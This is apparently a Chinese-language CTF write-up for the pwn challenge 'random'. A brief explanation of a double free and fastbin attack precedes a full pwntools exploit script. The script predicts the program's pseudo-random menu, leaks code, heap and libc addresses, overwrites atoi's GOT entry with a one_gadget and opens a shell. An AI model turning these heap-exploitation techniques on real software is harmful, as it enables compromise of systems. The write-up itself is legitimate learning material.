[Pwn] random - cpt.shao xp0int Posted on May 27 2019 在add函数选择添加明天的add以后链表出错,可以造一个double free。 本质上还是fastbin attack,但是不能随意控制操作,只能等伪随机数轮到相应的选项。 配合程序开始送的code段泄露,fastbin attack到bss段可以造任意写。 最后选择把atoi写成system,调用出错,写成onegadget 成功。 ## exp.py ```python from pwn import * import re import ctypes LIBC = ctypes.cdll.LoadLibrary('./libc-2.23.so') libc = ELF('./libc-2.23.so') context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' env = {'LD_PRELOAD': ''} # context.log_level = "debug" LIBC.srand(0) FUNC = ["add", "update", "delete", "view"] def rc(x): return p.recv(x) def ru(x): return p.recvuntil(x) def se(x): return p.send(x) def sl(x): return p.sendline(x) def sea(a, b): return p.sendafter(a, b) def sla(a, b): return p.sendlineafter(a, b) def info_addr(tag, addr): return p.info(tag + ': {:#x}'.format(addr)) def name(): sla("name:", "a"*7) def set_total(time): sla("\n", str(time)) def per_day(time): sla("10)", str(time)) def gen_ops(time): ops = [] for i in range(time): r = LIBC.rand() % 4 ops.append(FUNC[r]) p.info("predict:") print ops[::-1] def skip(time): for i in range(time): content = ru("N)\n") sl("N") op = content.split()[4] p.warn("skip %s" % op) def add(size, content, is_more=True): sla("N)", "Y") sla("note:", str(size)) sea("note:", content) if is_more: sla("N)", "Y") else: sla("N)", "N") def view(idx): sla("N)", "Y") sla("note:", str(idx)) def update(idx, content): sla("N)", "Y") sla("note:", str(idx)) sla("note:", content) def delete(idx): sla("N)", "Y") sla("note:", str(idx)) name() # leak code ru("a"*7 + "\n") leak_code = u64(rc(6) + "\x00\x00") info_addr("leak_code", leak_code) code = leak_code - 0xb90 set_total(20) # day 1 gen_ops(5) per_day(5) skip(5) # day 2 gen_ops(3) per_day(3) # first add add(0x17, "\x00"*0x17, True) skip(2) per_day(0) add(0x20, "\x00"*0x20, True) skip(1) # double free !!! per_day(0) add(0x17, "\x00"*0x17, True) per_day(0) add(0x17, "\x00"*0x17, True) gen_ops(4) per_day(4) view(3) # leak_heap content = ru("\nsuc")[1:7] + "\x00\x00" leak_heap = u64(content) heap = leak_heap - 0x30 info_addr("leak_heap", leak_heap) info_addr("heap", heap) skip(2) target = code + 0x203190 update(3, p64(target)) skip(1) for i in range(2): gen_ops(3) per_day(3) skip(3) gen_ops(4) per_day(4) # bp(code + 0x11ac) payload = p64(code + 0x203090) + p64(0x8) add(0x17, payload.ljust(0x17, "\x00"), False) # atoi stub view(2) # leak libc content = ru("\nsuc")[1:7] + "\x00\x00" leak_libc = u64(content) libc.address = leak_libc - libc.symbols['atoi'] info_addr("libc", libc.address) skip(2) gen_ops(2) per_day(2) one_gadget = libc.address +0xf1147 update(2, p64(one_gadget)) bp(code + 0x11ac) # gdb.attach(p, gdbcmd) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web] 高明的黑客 - LanceaKing [Pwn] trywrite -cpt.shao
没有帐号? 立即注册